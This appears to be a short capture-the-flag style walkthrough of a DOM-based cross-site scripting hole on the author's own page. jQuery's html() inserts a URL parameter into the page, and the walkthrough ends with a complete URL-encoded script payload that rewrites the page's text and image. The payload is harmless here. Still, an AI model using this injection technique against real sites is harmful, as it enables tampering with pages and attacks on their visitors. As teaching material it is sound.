Home

Observe the script. DOM is being changed using the jQuery method html(), which introduces an injection vulnerability. We need to pass malicious code into the variable note. After a bit of Googling, you would have found out that document.location.search refers to the URL parameter queries. This is apparent if you've noticed the unusually long link that was originally provided on the post...

We can inject code by modifying what comes after ?note= in the URL. But what we send must be encoded first...

document.getElementById('page-title').innerText = 'you are a beautiful person';
document.getElementById('keyword').innerText = 'well ok';
document.getElementsByTagName('img')[1].src = 'https://twlinux.github.io/img/penguins/smol.jpg';

Actually, we know this site uses jQuery.

<script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>

Our payload can be written simpler.

$('#page-title').text('you are a beautiful person');
$('#keyword').text('well ok');
$('img:eq(1)').attr('src', 'https://twlinux.github.io/img/penguins/smol.jpg');

Minify the script, put it between <script>...</script> tags, then append it to the URL.

https://twlinux.github.io/delet_this?note=%3Cscript%3E%24(%22%23page-title%22).text(%22you%20are%20a%20beautiful%20person%22)%2C%24(%22%23keyword%22).text(%22well%20ok%22)%2C%24(%22img%3Aeq(1)%22).attr(%22src%22%2C%22https%3A%2F%2Ftwlinux.github.io%2Fimg%2Fpenguins%2Fsmol.jpg%22)%3B%3C%2Fscript%3E